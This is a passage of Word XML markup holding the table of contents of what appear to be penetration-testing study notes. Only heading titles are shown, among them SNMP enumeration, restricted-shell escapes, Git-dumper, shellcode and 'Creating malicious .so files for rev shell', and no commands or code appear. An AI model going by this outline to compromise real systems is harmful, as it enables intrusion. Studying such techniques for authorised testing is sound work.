          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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6ifafi2vo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OID</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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q2pb6baqm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Most helpful SNMP commands</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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0lo8vcuie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from </w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_30lo8vcuieqx">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXXXXXXX</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_30lo8vcuieq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regarding installed applications</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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rb1uyaau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from </w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_erb1uyaauzc">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXXXXXXX</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_erb1uyaauz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 regarding looking at interesting non-default MIB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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yz6ao8k87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(HTB)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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8q6iyvigpl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ENUMERATING SNMP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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uxolg1f508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enable HOST-RESOURCES-MIB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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zqe5hririp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rsync</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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xuokffjarq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Git</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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f6dojytz2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access git repo that is not owned by you</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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5e9mw89uuu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Really complex git example</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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uc2lw9ar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Another git example</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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pru9x9lqk6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Git-dumper (to recreate repo)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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p5xdswd7c8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GitHub</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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eyrkopg6a2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How to download software with requirements:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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pattia3hx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ExploitDB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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opbjai5itf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Hosts</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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wntgfk3gdq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Finding users in Linux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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lbqdgeko6j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Vagrant</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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am44g81ut70">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DNS (port 53)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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b452a4lpxa8">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find IP of a machine given its FQDN or hostname using nslookup</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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ycpbmxbmtp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PDF</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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oxdx2f8hdv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Linux General</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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ry353zfkv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Recursively looking through directory</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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6rdlw7cvm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Help</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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01j719hndq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UID and GID</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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on7bld48i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/home</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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znzojfq9ac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things to know about Linux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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y5x8t4s5p8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Bash</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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mk60137xcb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Fuzzing web directories with bash scripting</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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04l9c8oqr7q">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Python</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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n9nao10g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change code from python2 to python3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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018qyuytl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get a bash shell when running python</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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tx7l4q9ns8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Python Hosting (to Transfer files to target)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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1qvicbmloc6">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rbash (restricted bash)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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w4nahmigye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Escaping restricted shell tips</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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e5w2rlo7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Escaping restricted shell using SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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0m2k3m6p0j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Escaping restricted shell using ed</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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rojlv1qs64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Escaping restricted shell using vi</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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a11ookcye3i">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Sublime Text</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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aujm93ad7i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Nano</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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6ng43f23qh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Java and .jar</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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yusaeut9tha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RDP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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nnlwwxzvhw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Creating malicious .so files for rev shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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w6gtha03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1</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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59rzjy8k7q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Everything about C (gcc, glibc, ldd, .so, -fPIC, -static)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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xc2cbrkmnv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XenSpawn</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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wa6axc044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Xenspawn walkthrough</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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w0v0dqkxu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-static vs. dynamically linked</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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th69kfo7f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Glibc</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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9m3q2ptsoe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-fPIC and -shared</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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ozsmkr7k4b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 files</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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4xikvd3q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ldd</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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huryag18u44">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compile C program (use .c files)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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1anqwl6hb6u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Cross-Compiling</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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5evh5g7emm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 to .exe</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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nkhvy6bhh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.cpp to .exe</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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dd9gwuvwcr3">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knockd (port knocking)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">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a1sy8a0nehd">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Shellcode</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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mfwt14wf70c">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Javascript</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
